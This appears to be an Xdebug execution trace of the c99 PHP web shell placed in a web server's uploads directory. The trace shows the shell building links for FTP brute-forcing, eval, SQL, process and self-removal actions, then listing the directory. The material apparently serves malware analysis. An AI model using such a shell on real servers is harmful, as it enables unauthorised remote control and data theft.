1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	191	0	0.014622	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	191	1	0.014640	1340368
2	191	R			'?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	192	0	0.014669	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	192	1	0.014682	1340400
2	192	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	193	0	0.014707	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	193	1	0.014719	1340352
2	193	R			'%2Fvar%2Fwww%2Fhtml'
2	194	0	0.014733	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	194	1	0.014749	1340416
2	194	R			'?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	195	0	0.014778	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	195	1	0.014791	1339912
2	195	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	196	0	0.014806	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=fsbuff&d=%d'
2	196	1	0.014821	1340056
2	196	R			'?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	197	0	0.014850	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	197	1	0.014865	1340368
2	197	R			'?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	198	0	0.014893	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	198	1	0.014906	1340400
2	198	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	199	0	0.014930	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	199	1	0.014943	1340352
2	199	R			'%2Fvar%2Fwww%2Fhtml'
2	200	0	0.014956	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	200	1	0.014972	1340416
2	200	R			'?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=fsbuff&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	201	0	0.015001	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	201	1	0.015014	1339912
2	201	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	202	0	0.015028	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=encoder&d=%d'
2	202	1	0.015044	1340056
2	202	R			'?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	203	0	0.015072	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	203	1	0.015087	1340368
2	203	R			'?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	204	0	0.015115	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	204	1	0.015128	1340400
2	204	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	205	0	0.015152	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	205	1	0.015165	1340352
2	205	R			'%2Fvar%2Fwww%2Fhtml'
2	206	0	0.015179	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	206	1	0.015194	1340416
2	206	R			'?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=encoder&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	207	0	0.015223	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	207	1	0.015235	1339912
2	207	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	208	0	0.015250	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=tools&d=%d'
2	208	1	0.015268	1340056
2	208	R			'?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	209	0	0.015297	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	209	1	0.015312	1340368
2	209	R			'?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	210	0	0.015339	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	210	1	0.015352	1340400
2	210	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	211	0	0.015376	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	211	1	0.015388	1340352
2	211	R			'%2Fvar%2Fwww%2Fhtml'
2	212	0	0.015402	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	212	1	0.015417	1340416
2	212	R			'?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=tools&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	213	0	0.015445	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	213	1	0.015458	1339912
2	213	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	214	0	0.015473	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=processes&d=%d'
2	214	1	0.015489	1340056
2	214	R			'?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	215	0	0.015517	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	215	1	0.015532	1340368
2	215	R			'?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	216	0	0.015559	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	216	1	0.015572	1340400
2	216	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	217	0	0.015596	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	217	1	0.015609	1340352
2	217	R			'%2Fvar%2Fwww%2Fhtml'
2	218	0	0.015623	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	218	1	0.015639	1340416
2	218	R			'?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=processes&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	219	0	0.015667	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	219	1	0.015680	1339912
2	219	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	220	0	0.015694	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=ftpquickbrute&d=%d'
2	220	1	0.015710	1340056
2	220	R			'?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	221	0	0.015740	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	221	1	0.015756	1340368
2	221	R			'?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	222	0	0.015787	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	222	1	0.015800	1340400
2	222	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	223	0	0.015861	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	223	1	0.015874	1340352
2	223	R			'%2Fvar%2Fwww%2Fhtml'
2	224	0	0.015888	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	224	1	0.015905	1340416
2	224	R			'?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=ftpquickbrute&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	225	0	0.015938	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	225	1	0.015951	1339912
2	225	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	226	0	0.015966	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=security&d=%d'
2	226	1	0.015982	1340056
2	226	R			'?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	227	0	0.016011	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	227	1	0.016026	1340368
2	227	R			'?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	228	0	0.016054	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	228	1	0.016067	1340400
2	228	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	229	0	0.016091	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	229	1	0.016103	1340352
2	229	R			'%2Fvar%2Fwww%2Fhtml'
2	230	0	0.016117	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	230	1	0.016133	1340416
2	230	R			'?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=security&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	231	0	0.016161	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	231	1	0.016174	1339912
2	231	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	232	0	0.016189	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=sql&d=%d'
2	232	1	0.016204	1340056
2	232	R			'?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	233	0	0.016232	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	233	1	0.016247	1340368
2	233	R			'?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	234	0	0.016275	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	234	1	0.016288	1340400
2	234	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	235	0	0.016312	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	235	1	0.016325	1340352
2	235	R			'%2Fvar%2Fwww%2Fhtml'
2	236	0	0.016338	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	236	1	0.016354	1340416
2	236	R			'?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=sql&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	237	0	0.016382	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	237	1	0.016395	1339912
2	237	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	238	0	0.016410	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=eval&d=%d'
2	238	1	0.016425	1340056
2	238	R			'?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	239	0	0.016457	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	239	1	0.016473	1340368
2	239	R			'?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	240	0	0.016500	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	240	1	0.016512	1340400
2	240	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	241	0	0.016536	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	241	1	0.016553	1340352
2	241	R			'%2Fvar%2Fwww%2Fhtml'
2	242	0	0.016567	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	242	1	0.016582	1340416
2	242	R			'?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=eval&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	243	0	0.016611	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	243	1	0.016624	1339912
2	243	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	244	0	0.016639	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=feedback&d=%d'
2	244	1	0.016654	1340056
2	244	R			'?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	245	0	0.016683	1340272	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	245	1	0.016699	1340368
2	245	R			'?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	246	0	0.016727	1340328	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	246	1	0.016740	1340400
2	246	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	247	0	0.016764	1340272	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	247	1	0.016777	1340352
2	247	R			'%2Fvar%2Fwww%2Fhtml'
2	248	0	0.016790	1340320	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	248	1	0.016806	1340416
2	248	R			'?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=feedback&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	249	0	0.016835	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	249	1	0.016848	1339912
2	249	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	250	0	0.016862	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=selfremove'
2	250	1	0.016878	1339976
2	250	R			'?act=selfremove'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=selfremove'
2	251	0	0.016903	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=selfremove'
2	251	1	0.016917	1340288
2	251	R			'?act=selfremove'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=selfremove'
2	252	0	0.016942	1340248	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	252	1	0.016955	1340320
2	252	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	253	0	0.016979	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	253	1	0.016991	1340272
2	253	R			'%2Fvar%2Fwww%2Fhtml'
2	254	0	0.017005	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=selfremove'
2	254	1	0.017019	1340336
2	254	R			'?act=selfremove'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=selfremove'
2	255	0	0.017045	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	255	1	0.017058	1339912
2	255	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	256	0	0.017072	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	256	1	0.017090	1339976
2	256	R			'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	257	0	0.017121	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	257	1	0.017137	1340288
2	257	R			'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	258	0	0.017169	1340248	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	258	1	0.017183	1340320
2	258	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	259	0	0.017207	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	259	1	0.017220	1340272
2	259	R			'%2Fvar%2Fwww%2Fhtml'
2	260	0	0.017234	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	260	1	0.017251	1340336
2	260	R			'#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '#" onclick="if (confirm(\'Are you sure dude?\')) window.close()'
2	261	0	0.017282	1340192	in_array	0		/var/www/html/uploads/c99_php7.4.php	977	2	''	[0 => '']
2	261	1	0.017296	1340264
2	261	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	979	$dspact = 'ls'
1		A						/var/www/html/uploads/c99_php7.4.php	979	$act = 'ls'
1		A						/var/www/html/uploads/c99_php7.4.php	1938	$list = []
2	262	0	0.017355	1340032	opendir	0		/var/www/html/uploads/c99_php7.4.php	1939	1	'/var/www/html/uploads/'
2	262	1	0.017376	1340424
2	262	R			resource(5) of type (stream)
1		A						/var/www/html/uploads/c99_php7.4.php	1939	$h = resource(5) of type (stream)
2	263	0	0.017402	1340392	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	263	1	0.017424	1340472
2	263	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = 'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/c99_php7.4.php'
2	264	0	0.017460	1340872	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	264	1	0.017474	1340944
2	264	R			'..'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = '..'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/..'
2	265	0	0.017507	1340920	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	265	1	0.017520	1340992
2	265	R			'.'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = '.'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/.'
2	266	0	0.017552	1340968	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	266	1	0.017565	1341048
2	266	R			'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = 'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/prepend.php'
2	267	0	0.017600	1341040	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	267	1	0.017613	1341112
2	267	R			'data'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = 'data'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/data'
2	268	0	0.017646	1341088	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	268	1	0.017659	1341168
2	268	R			'.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = '.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$list[] = '/var/www/html/uploads/.htaccess'
2	269	0	0.017692	1341152	readdir	0		/var/www/html/uploads/c99_php7.4.php	1941	1	resource(5) of type (stream)
2	269	1	0.017705	1341192
2	269	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	1941	$o = FALSE
2	270	0	0.017729	1341112	closedir	0		/var/www/html/uploads/c99_php7.4.php	1942	1	resource(5) of type (stream)
2	270	1	0.017744	1340928
2	270	R			NULL
1		A						/var/www/html/uploads/c99_php7.4.php	1950	$objects = []
1		A						/var/www/html/uploads/c99_php7.4.php	1951	$vd = 'f'
1		A						/var/www/html/uploads/c99_php7.4.php	1954	$objects['head'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	1955	$objects['folders'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	1956	$objects['links'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	1957	$objects['files'] = []
2	271	0	0.017821	1341224	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/c99_php7.4.php'
2	271	1	0.017842	1341296
2	271	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = 'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
2	272	0	0.017877	1341264	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1964	1	'/var/www/html/uploads/c99_php7.4.php'
2	272	1	0.017892	1341320
2	272	R			FALSE
2	273	0	0.017905	1341280	is_file	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/c99_php7.4.php'
2	273	1	0.017918	1341320
2	273	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = '/var/www/html/uploads/c99_php7.4.php'
2	274	0	0.017942	1341656	filesize	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/c99_php7.4.php'
2	274	1	0.017954	1341696
2	274	R			160253
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = 160253
2	275	0	0.017978	1341656	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/c99_php7.4.php'
2	275	1	0.017991	1341696
2	275	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	276	0	0.018014	1341656	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/c99_php7.4.php'
2	276	1	0.018026	1341696
2	276	R			1000
2	277	0	0.018039	1341656	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	1000
2	277	1	0.018072	1342472
2	277	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
